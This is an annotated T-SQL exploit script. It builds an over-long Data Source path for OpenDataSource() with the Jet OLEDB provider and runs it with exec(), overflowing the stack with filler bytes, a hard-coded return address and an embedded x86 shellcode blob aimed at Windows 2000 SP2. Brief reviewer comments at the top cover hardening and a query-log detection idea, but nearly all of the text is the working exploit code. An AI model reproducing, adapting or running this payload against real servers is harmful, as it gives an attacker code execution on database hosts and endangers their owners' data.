How an exploit is written for SQL Server: a T-SQL exploit example


-- Purpose: assembles one dynamic T-SQL statement that calls OpenDataSource() with the
-- Microsoft.Jet.OLEDB.4.0 provider and an over-long "Data Source" path, then runs it with
-- exec(). The path is: filler bytes, a 4-byte value aimed at the saved return address,
-- more filler, and a machine-code blob (see the author's comments below).
--
-- NOTE(review): the statement only works where ad hoc OLE DB access through
-- OpenDataSource/OpenRowset is permitted for the calling login. Hardening to confirm on
-- a reviewed server: provider and SQL Server patches applied, the provider's
-- DisallowAdhocAccess option set (or 'Ad Hoc Distributed Queries' left disabled on
-- versions that have that setting), and no Jet provider ad hoc access for low-privileged logins.
-- NOTE(review): detection angle - a Data Source value thousands of bytes long, or one
-- made of a repeated filler byte, inside an OpenDataSource/OpenRowset call is abnormal
-- and worth alerting on in query audit logs.

-- Final statement text; nvarchar(4000) has to hold prefix + payload + suffix.
declare @exploit nvarchar(4000) 
-- Filler that precedes the return-address value.
declare @padding nvarchar(2000) 
-- The 4 bytes the author intends to land on the saved return address.
declare @saved_return_address nvarchar(20) 
-- Machine-code blob appended after the second filler.
declare @code nvarchar(1000) 
-- Two-byte unit appended to @padding on each loop pass.
declare @pad nvarchar(16) 
-- Loop counter.
declare @cnt int 
-- Filler between the return-address value and @code.
declare @more_pad nvarchar(100) 
select @cnt = 0 
-- Binary literals are assigned straight into nvarchar variables throughout; this presumably
-- relies on the implicit conversion copying the bytes unchanged - TODO confirm on the target version.
select @padding = 0x41414141 
select @pad = 0x4141 
-- 4 initial bytes + 1063 passes x 2 bytes = 2130 bytes of 0x41 filler.
while @cnt < 1063 
begin 

                                select @padding = @padding + @pad 

                                select @cnt = @cnt + 1 

end 
-- overwrite the saved return address 
-- (the value is hard-coded, so it is tied to one specific memory layout)

select @saved_return_address = 0xDCC9B042 
-- 20 bytes of distinguishable filler (0x43.. through 0x47.., four of each).
select @more_pad = 0x4343434344444444454545454646464647474747 

-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K Sp2 
 -- change if running a different service pack 
-- The address appears inside the blob in little-endian byte order (87 6F E8 77), which is
-- why the blob is specific to one OS build; the trailing 0xCC bytes are the x86 INT3 opcode.

select @code = 0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0C05052B8876FE877FFD0CCCCCCCCCC 
-- Prefix: opens the OpenDataSource call and the quoted Data Source path (c:\...).
select @exploit = N'SELECT * FROM OpenDataSource( ''Microsoft.Jet.OLEDB.4.0'',''Data Source="c:\' 
-- Payload order matters: filler, return-address value, filler, code.
select @exploit = @exploit + @padding + @saved_return_address + @more_pad + @code 
-- Suffix: closes the path, supplies the remaining provider properties, and names the
-- object "xactions" through the four-part ...name form.
select @exploit = @exploit + N'";User ID=Admin;Password=;Extended properties=Excel 5.0'')...xactions' 
-- Runs the assembled string as dynamic SQL.
exec (@exploit)